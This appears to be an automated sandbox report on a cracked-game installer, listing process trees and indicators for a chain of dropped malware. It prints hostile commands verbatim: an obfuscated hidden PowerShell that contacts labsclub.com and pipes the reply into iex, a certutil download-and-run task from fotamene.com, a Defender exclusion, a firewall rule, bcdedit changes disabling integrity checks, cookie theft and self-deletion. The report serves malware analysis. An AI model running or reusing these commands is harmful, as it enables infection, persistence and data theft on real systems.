description pid Process Token: SeDebugPrivilege 892 Setup.exe Token: SeDebugPrivilege 2484 18346303869.exe Token: SeDebugPrivilege 2216 Install.exe Token: SeDebugPrivilege 1056 MicrosoftEdge.exe Token: SeDebugPrivilege 1056 MicrosoftEdge.exe Token: SeDebugPrivilege 1056 MicrosoftEdge.exe Token: SeDebugPrivilege 1056 MicrosoftEdge.exe Token: SeDebugPrivilege 4540 multitimer.exe Token: SeDebugPrivilege 4816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4816 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4816 MicrosoftEdgeCP.exe Token: SeCreateTokenPrivilege 3744 askinstall24.exe Token: SeAssignPrimaryTokenPrivilege 3744 askinstall24.exe Token: SeLockMemoryPrivilege 3744 askinstall24.exe Token: SeIncreaseQuotaPrivilege 3744 askinstall24.exe Token: SeMachineAccountPrivilege 3744 askinstall24.exe Token: SeTcbPrivilege 3744 askinstall24.exe Token: SeSecurityPrivilege 3744 askinstall24.exe Token: SeTakeOwnershipPrivilege 3744 askinstall24.exe Token: SeLoadDriverPrivilege 3744 askinstall24.exe Token: SeSystemProfilePrivilege 3744 askinstall24.exe Token: SeSystemtimePrivilege 3744 askinstall24.exe Token: SeProfSingleProcessPrivilege 3744 askinstall24.exe Token: SeIncBasePriorityPrivilege 3744 askinstall24.exe Token: SeCreatePagefilePrivilege 3744 askinstall24.exe Token: SeCreatePermanentPrivilege 3744 askinstall24.exe Token: SeBackupPrivilege 3744 askinstall24.exe Token: SeRestorePrivilege 3744 askinstall24.exe Token: SeShutdownPrivilege 3744 askinstall24.exe Token: SeDebugPrivilege 3744 askinstall24.exe Token: SeAuditPrivilege 3744 askinstall24.exe Token: SeSystemEnvironmentPrivilege 3744 askinstall24.exe Token: SeChangeNotifyPrivilege 3744 askinstall24.exe Token: SeRemoteShutdownPrivilege 3744 askinstall24.exe Token: SeUndockPrivilege 3744 askinstall24.exe Token: SeSyncAgentPrivilege 3744 askinstall24.exe Token: SeEnableDelegationPrivilege 3744 askinstall24.exe Token: SeManageVolumePrivilege 3744 askinstall24.exe Token: SeImpersonatePrivilege 3744 askinstall24.exe Token: SeCreateGlobalPrivilege 3744 askinstall24.exe Token: 31 3744 askinstall24.exe Token: 32 3744 askinstall24.exe Token: 33 3744 askinstall24.exe Token: 34 3744 askinstall24.exe Token: 35 3744 askinstall24.exe Token: SeDebugPrivilege 4460 taskkill.exe Token: SeDebugPrivilege 5192 vpn.tmp Token: SeDebugPrivilege 5192 vpn.tmp Token: SeDebugPrivilege 4124 AwesomePoolU1.exe Token: SeDebugPrivilege 6140 taskkill.exe Token: SeDebugPrivilege 5688 QRTBeTEpQLFpEn8kg1g9vgl7.exe Token: SeDebugPrivilege 5628 xsisRmf9QYcorUoW9aDkaynv.exe Token: SeDebugPrivilege 408 OTv1aoIKsmaXSh1jpUZgH0XD.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 5220 1dqKDXdM3UJScuo9hogG4Vho.exe Token: SeDebugPrivilege 5916 Ybpwj9zioycMdvwemGxd9rLc.exe Token: SeShutdownPrivilege 3020 Process not Found Token: SeCreatePagefilePrivilege 3020 Process not Found Token: SeLoadDriverPrivilege 5216 dynboTs5K5sKXUxUcUOJZeiw.exe Token: SeLoadDriverPrivilege 5216 dynboTs5K5sKXUxUcUOJZeiw.exe Token: SeLoadDriverPrivilege 5216 dynboTs5K5sKXUxUcUOJZeiw.exe Token: SeDebugPrivilege 5180 DsdXQewqsY5YG78RFSKRSEOp.exe Token: SeLoadDriverPrivilege 5116 6sUPec57VI5dpryixwk9LfT3.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2192 Setup3310.tmp 5268 IBInstaller_97039.tmp 5192 vpn.tmp 2484 18346303869.exe 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5204 vict.tmp 5352 cpb0ufehxrl.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp 5192 vpn.tmp -
Suspicious use of SetWindowsHookEx 31 IoCs
pid Process 488 setups.exe 3424 setups.tmp 1056 MicrosoftEdge.exe 4664 MicrosoftEdgeCP.exe 4664 MicrosoftEdgeCP.exe 3120 Setup3310.exe 4840 vict.exe 3744 askinstall24.exe 5084 IBInstaller_97039.exe 4648 vpn.exe 2192 Setup3310.tmp 5160 cpb0ufehxrl.exe 5192 vpn.tmp 5204 vict.tmp 5268 IBInstaller_97039.tmp 5352 cpb0ufehxrl.tmp 5468 chrome_proxy.exe 5908 app.exe 6060 winhost.exe 4328 Setup.exe 4564 Setup.tmp 6532 Delta.exe 6568 Delta.tmp 6808 tapinstall.exe 2080 Setup.exe 6472 hjjgaa.exe 6804 7za.exe 5312 jfiag3g_gg.exe 6444 7za.exe 5580 tapinstall.exe 5272 jfiag3g_gg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 68 wrote to memory of 3876 68 Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe 78 PID 68 wrote to memory of 3876 68 Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe 78 PID 68 wrote to memory of 3876 68 Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe 78 PID 3876 wrote to memory of 1940 3876 cmd.exe 81 PID 3876 wrote to memory of 1940 3876 cmd.exe 81 PID 3876 wrote to memory of 1940 3876 cmd.exe 81 PID 3876 wrote to memory of 3196 3876 cmd.exe 82 PID 3876 wrote to memory of 3196 3876 cmd.exe 82 PID 3876 wrote to memory of 3196 3876 cmd.exe 82 PID 3876 wrote to memory of 2668 3876 cmd.exe 83 PID 3876 wrote to memory of 2668 3876 cmd.exe 83 PID 3876 wrote to memory of 2668 3876 cmd.exe 83 PID 3876 wrote to memory of 1152 3876 cmd.exe 84 PID 3876 wrote to memory of 1152 3876 cmd.exe 84 PID 3876 wrote to memory of 1152 3876 cmd.exe 84 PID 1940 wrote to memory of 676 1940 keygen-pr.exe 85 PID 1940 wrote to memory of 676 1940 keygen-pr.exe 85 PID 1940 wrote to memory of 676 1940 keygen-pr.exe 85 PID 1152 wrote to memory of 892 1152 keygen-step-4.exe 86 PID 1152 wrote to memory of 892 1152 keygen-step-4.exe 86 PID 2668 wrote to memory of 848 2668 keygen-step-3.exe 87 PID 2668 wrote to memory of 848 2668 keygen-step-3.exe 87 PID 2668 wrote to memory of 848 2668 keygen-step-3.exe 87 PID 676 wrote to memory of 3968 676 key.exe 89 PID 676 wrote to memory of 3968 676 key.exe 89 PID 676 wrote to memory of 3968 676 key.exe 89 PID 848 wrote to memory of 1452 848 cmd.exe 90 PID 848 wrote to memory of 1452 848 cmd.exe 90 PID 848 wrote to memory of 1452 848 cmd.exe 90 PID 892 wrote to memory of 2484 892 Setup.exe 112 PID 892 wrote to memory of 2484 892 Setup.exe 112 PID 892 wrote to memory of 488 892 Setup.exe 92 PID 892 wrote to memory of 488 892 Setup.exe 92 PID 892 wrote to memory of 488 892 Setup.exe 92 PID 1152 wrote to memory of 2216 1152 keygen-step-4.exe 93 PID 1152 wrote to memory of 2216 1152 keygen-step-4.exe 93 PID 1152 wrote to memory of 2216 1152 keygen-step-4.exe 93 PID 488 wrote to memory of 3424 488 setups.exe 94 PID 488 wrote to memory of 3424 488 setups.exe 94 PID 488 wrote to memory of 3424 488 setups.exe 94 PID 2216 wrote to memory of 4104 2216 Install.exe 98 PID 2216 wrote to memory of 4104 2216 Install.exe 98 PID 2216 wrote to memory of 4104 2216 Install.exe 98 PID 2484 wrote to memory of 4408 2484 18346303869.exe 100 PID 2484 wrote to memory of 4408 2484 18346303869.exe 100 PID 4408 wrote to memory of 4540 4408 multitimer.exe 101 PID 4408 wrote to memory of 4540 4408 multitimer.exe 101 PID 4104 wrote to memory of 4804 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 104 PID 4104 wrote to memory of 4804 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 104 PID 4104 wrote to memory of 4804 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 104 PID 4804 wrote to memory of 4888 4804 cmd.exe 106 PID 4804 wrote to memory of 4888 4804 cmd.exe 106 PID 4804 wrote to memory of 4888 4804 cmd.exe 106 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4888 wrote to memory of 4996 4888 79139104910.exe 107 PID 4104 wrote to memory of 5056 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 109 PID 4104 wrote to memory of 5056 4104 JZSeNrBW2SHXmrQOsDhEcB9n.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe"C:\Users\Admin\AppData\Local\Temp\Mini.Golf.Oid.Free.v3.16.1.crack.by.F4CG.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:68 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3196
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1452
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 1 3.1616404477.60585ffdd96ce 1016⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\RFLML93XSF\multitimer.exe" 2 3.1616404477.60585ffdd96ce7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe" /Verysilent /subid=5778⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\is-S9MHF.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9MHF.tmp\Setup3310.tmp" /SL5="$10332,138429,56832,C:\Users\Admin\AppData\Local\Temp\eb4gs3kr2n1\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2192 -
C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4328 -
C:\Users\Admin\AppData\Local\Temp\is-0VUDC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-0VUDC.tmp\Setup.tmp" /SL5="$2056A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-R61HG.tmp\Setup.exe" /Verysilent11⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4564 -
C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe" /Verysilent12⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6532 -
C:\Users\Admin\AppData\Local\Temp\is-FKQEM.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-FKQEM.tmp\Delta.tmp" /SL5="$2054C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\Delta.exe" /Verysilent13⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:6568 -
C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe" /VERYSILENT14⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-0OJR3.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit15⤵PID:7064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f16⤵
- Kills process with taskkill
PID:6040
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 616⤵
- Delays execution with timeout.exe
PID:7132
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-4T9F2.tmp\hjjgaa.exe" /Verysilent12⤵
- Suspicious use of SetWindowsHookEx
PID:6472 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Suspicious use of SetWindowsHookEx
PID:5312
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Suspicious use of SetWindowsHookEx
PID:5272
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\qq52m2l3xf5\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\qq52m2l3xf5\askinstall24.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3744 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:6032
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5084 -
C:\Users\Admin\AppData\Local\Temp\is-OFSKF.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-OFSKF.tmp\IBInstaller_97039.tmp" /SL5="$1033C,9898950,721408,C:\Users\Admin\AppData\Local\Temp\bzevo02lcli\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5268
-
-
-
C:\Users\Admin\AppData\Local\Temp\bpsx5satohb\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\bpsx5satohb\AwesomePoolU1.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe"C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4648 -
C:\Users\Admin\AppData\Local\Temp\is-QHTSS.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-QHTSS.tmp\vpn.tmp" /SL5="$1033A,15170975,270336,C:\Users\Admin\AppData\Local\Temp\awh1adz1hcc\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5192 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6524
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:6808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4128
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:5580
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5948
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:6484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe"C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4840 -
C:\Users\Admin\AppData\Local\Temp\is-IUD5M.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IUD5M.tmp\vict.tmp" /SL5="$10338,870426,780800,C:\Users\Admin\AppData\Local\Temp\vssiahy0njg\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5204 -
C:\Users\Admin\AppData\Local\Temp\is-FOFK7.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-FOFK7.tmp\winhost.exe" 53510⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6060 -
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"11⤵PID:6280
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"12⤵
- Loads dropped DLL
PID:6504 -
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dll"13⤵
- Loads dropped DLL
PID:6540
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dlloyl8C1mF2.dll"11⤵PID:6748
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\BwavubGg3.dlloyl8C1mF2.dll"12⤵PID:5844
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:7832
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7888
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe"C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5160 -
C:\Users\Admin\AppData\Local\Temp\is-0Q5R8.tmp\cpb0ufehxrl.tmp"C:\Users\Admin\AppData\Local\Temp\is-0Q5R8.tmp\cpb0ufehxrl.tmp" /SL5="$103CA,2592217,780800,C:\Users\Admin\AppData\Local\Temp\z0vf0hvbfl3\cpb0ufehxrl.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5352
-
-
-
C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe"C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:5148 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "pcuwnkxw0yo.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ykgpwhqhykg\pcuwnkxw0yo.exe" & exit9⤵PID:4812
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "pcuwnkxw0yo.exe" /f10⤵
- Kills process with taskkill
PID:5856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yzcamdp10hg\app.exe"C:\Users\Admin\AppData\Local\Temp\yzcamdp10hg\app.exe" /8-238⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Delicate-Voice"9⤵
- Suspicious use of AdjustPrivilegeToken
PID:4356
-
-
C:\Program Files (x86)\Delicate-Voice\7za.exe"C:\Program Files (x86)\Delicate-Voice\7za.exe" e -p154.61.71.13 winamp-plugins.7z9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6804
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Delicate-Voice\app.exe" -map "C:\Program Files (x86)\Delicate-Voice\WinmonProcessMonitor.sys""9⤵PID:7124
-
C:\Program Files (x86)\Delicate-Voice\app.exe"C:\Program Files (x86)\Delicate-Voice\app.exe" -map "C:\Program Files (x86)\Delicate-Voice\WinmonProcessMonitor.sys"10⤵
- Suspicious behavior: LoadsDriver
PID:1760
-
-
-
C:\Program Files (x86)\Delicate-Voice\7za.exe"C:\Program Files (x86)\Delicate-Voice\7za.exe" e -p154.61.71.13 winamp.7z9⤵
- Suspicious use of SetWindowsHookEx
PID:6444
-
-
C:\Program Files (x86)\Delicate-Voice\app.exe"C:\Program Files (x86)\Delicate-Voice\app.exe" /8-239⤵PID:6332
-
C:\Program Files (x86)\Delicate-Voice\app.exe"C:\Program Files (x86)\Delicate-Voice\app.exe" /8-2310⤵PID:6544
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"11⤵PID:7228
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes12⤵PID:7288
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-2311⤵PID:7456
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F12⤵
- Creates scheduled task(s)
PID:5644
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F12⤵
- Creates scheduled task(s)
PID:5576
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"12⤵PID:8076
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER13⤵
- Modifies boot configuration data using bcdedit
PID:10796
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:10852
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:13⤵
- Modifies boot configuration data using bcdedit
PID:10904
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows13⤵
- Modifies boot configuration data using bcdedit
PID:10956
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe13⤵
- Modifies boot configuration data using bcdedit
PID:11008
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe13⤵
- Modifies boot configuration data using bcdedit
PID:11064
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 013⤵
- Modifies boot configuration data using bcdedit
PID:11124
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn13⤵
- Modifies boot configuration data using bcdedit
PID:11172
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 113⤵
- Modifies boot configuration data using bcdedit
PID:11256
-
-
